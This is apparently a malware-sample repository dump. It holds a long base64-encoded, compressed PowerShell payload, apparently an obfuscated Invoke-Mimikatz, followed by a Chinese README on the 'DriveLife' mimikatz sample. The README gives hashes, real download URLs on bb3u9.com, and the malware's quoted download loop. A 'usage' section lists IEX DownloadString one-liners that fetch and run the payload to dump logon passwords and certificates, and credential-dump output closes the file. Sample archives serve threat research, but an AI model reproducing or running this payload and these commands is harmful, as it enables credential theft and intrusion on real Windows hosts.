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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd(); -------------------------------------------------------------------------------- /DriveLife/mimikataz-ps1/README.md: -------------------------------------------------------------------------------- 1 | ### "驱动人生"-mimikatz样本 2 | 3 | ``` 4 | 7fe00c654df98f23409bf4416b6394d6e8af6a83c4a31ea42e0c4e82e866735d PEBytes32.dll 5 | ef525c47de9cceacafe796b28c09d4780a2cc49abc3f2199ae2e83bc7b4b78fa PEBytes64.dll 6 | fa1331aba1f68ca18f3ad8a8f6c87526e6d69ed4734312f997215660f2d50aac README.md 7 | e70132be487ca63d5b5d52cfa25273958526dc896c62eaf8bea041339fa8aece mimi.dat 8 | ``` 9 | 10 | #### REFERENCE: 11 | 12 | https://raw.githubusercontent.com/vysecurity/ps1-toolkit/master/Invoke-Mimikatz.ps1 13 | 14 | 15 | 16 | #### virustotal 样本地址: 17 | 18 | First Submission: 2021-03-31 11:10:21 19 | 20 | SHA-256:e70132be487ca63d5b5d52cfa25273958526dc896c62eaf8bea041339fa8aece 21 | 22 | https://www.virustotal.com/gui/file/e70132be487ca63d5b5d52cfa25273958526dc896c62eaf8bea041339fa8aece/community 23 | 24 | 25 | 26 | 远程下载地址: 27 | 28 | ```cmd 29 | http://bb3u9.com/mimi.dat?v=&r=1 30 | http://bb3u9.com/mimi.dat?v=&r=2 31 | http://bb3u9.com/mimi.dat?v=&r=3 32 | ``` 33 | 34 | 35 | 36 | ```powershell 37 | if-1.4.ps1:15841:$mimipath = $env:tmp+'\mimi.dat' 38 | if-1.4.ps1:15851: try{(new-object System.Net.WebClient).DownloadFile($down_url+"/mimi.dat?v=$VVERSION&r=$d_retry",$mimipath)}catch{} 39 | 40 | ———————————————————————————————————————————————————————————————————————————————————————————————————— 41 | 42 | $mimipath = $env:tmp+'\mimi.dat' 43 | 44 | $d_retry=3 45 | 46 | while(!(Test-Path $mimipath) -or (Get-Item $mimipath).length -ne 3563487){ 47 | if($d_retry -eq 0){break} 48 | write-host "try to get mimi...$d_retry" 49 | try{(new-object System.Net.WebClient).DownloadFile($down_url+"/mimi.dat?v=$VVERSION&r=$d_retry",$mimipath)}catch{} 50 | $d_retry-- 51 | start-sleep 1 52 | 53 | } 54 | ``` 55 | 56 | 57 | 58 | ### 使用方法: 59 | 60 | ```powershell 61 | #目标主机具备网络环境 62 | powershell "IEX (New-Object Net.WebClient).DownloadString('https://www.xxx.com/mimi.dat'); Invoke-Udyeijdyqid -kkudhqydyq2" 63 | 64 | #目标主机不具备网络环境 65 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/mimi.dat');Invoke-Udyeijdyqid -kkudhqydyq2" 66 | 67 | #把文件下载到目标主机进行执行 68 | powershell Import-Module .\mimi.dat;Invoke-Udyeijdyqid -Command '"privilege::debug" "sekurlsa::logonPasswords exit"' 69 | 70 | #其他使用方法 71 | powershell -NonInteractive Import-Module .\mimi.dat;Invoke-Udyeijdyqid -kkudhqydyq2 72 | powershell -NonInteractive Import-Module .\mimi.dat;Invoke-Udyeijdyqid -DumpCerts 73 | powershell -NonInteractive Import-Module .\mimi.dat;Invoke-Udyeijdyqid -Command '"privilege::debug" "sekurlsa::logonPasswords exit"' 74 | ``` 75 | 76 | 默认使用的是:mimikatz 2.2.0 77 | 78 | ```cmd 79 | PS C:\temp> .\mimi.ps1;Invoke-Udyeijdyqid 80 | S-1-5-21-2070056706-1071056509-2494751531-1000 81 | Hostname: xxx-PC / S-1-5-21-2070056706-1071056509-2494751531 82 | 83 | .#####. mimikatz 2.2.0 (x64) #19041 Sep 27 2020 13:42:38 84 | .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) 85 | ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 86 | ## \ / ## > https://blog.gentilkiwi.com/mimikatz 87 | '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) 88 | '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ 89 | 90 | mimikatz(powershell) # sekurlsa::logonpasswords 91 | 92 | Authentication Id : 0 ; 629014 (00000000:00099916) 93 | Session : Interactive from 1 94 | User Name : xxx 95 | Domain : xxx-PC 96 | Logon Server : xxx-PC 97 | Logon Time : 2021/11/1 10:49:09 98 | SID : S-1-5-21-2070056706-1071056509-2494751531-1000 99 | msv : 100 | [00000003] Primary 101 | * Username : xxx 102 | * Domain : xxx-PC 103 | * NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 104 | * SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 105 | [00010000] CredentialKeys 106 | * NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 107 | * SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 108 | tspkg : 109 | wdigest : 110 | * Username : xxx 111 | * Domain : xxx-PC 112 | * Password : xxxxxxxxx 113 | ``` 114 | 115 | 